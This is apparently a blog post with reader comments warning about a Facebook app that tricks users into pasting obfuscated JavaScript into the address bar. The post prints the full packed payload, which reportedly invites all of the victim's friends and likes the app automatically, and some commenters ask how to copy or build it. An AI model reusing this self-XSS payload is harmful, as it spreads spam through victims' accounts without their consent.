[Update 2: The following app has been removed by facebook.]
[Update 1: The app invites all your friends, and likes the app automatically. It does not hack your account or cookie. Thanks Ahmud]
A perfectly crafted FaceBook app to hack your account. Here is URL: 10 lies girls ALWAYS tell guys! funny! (Do not follow instructions unless you want your account be compromised)
The app asks you to press <ctrl> + C, <alt> + D, <ctrl> + V and <enter> to paste a JavaScript in to your browser’s address bar. I don’t know what will happen next, follow the instructions if you want your account to be compromised 
.
JavaScript it pastes:
javascript:(function(){a='app120196878004524_jop';b='app120196878004524_jode';ifc='app120196878004524_ifc';ifo='app120196878004524_ifo';mw='app120196878004524_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
The app has an hidden <textarea> with keyboard focus. When you press <ctrl> + C, its content gets selected and then you follow instructions to paste it in address bar! Never ever do that.
8 Comments
Can you please tell me…. when I use the script that is hidden and which the users copy with the keyboard commands does not work on other pages?
in other words… can you tell me if I can copy their work
I am not going to use it for spam purposes with nothing after joining the group
Thank you in advance
I do not know what the script does actually. Don;t ever do that (to hack others account), they will hunt you down
.
Note: you are not advised to copy paste java script into address bar and run it.
I managed to decode the Encrypted JS Line & Came to know that JS could not hack a facebook account nor any other … It is used to select all your friends and invite them… And automatically Like the page. So it doesnt harm anybody at all.
Hope you Understood
./Stateover
i read your post little late
Does any one knows how to create this application
ya..its good..& evry1 shud kw ths
I read it,its an very good blog which flash light on hacking….
IS this kind of SQL Injection???
Post a Comment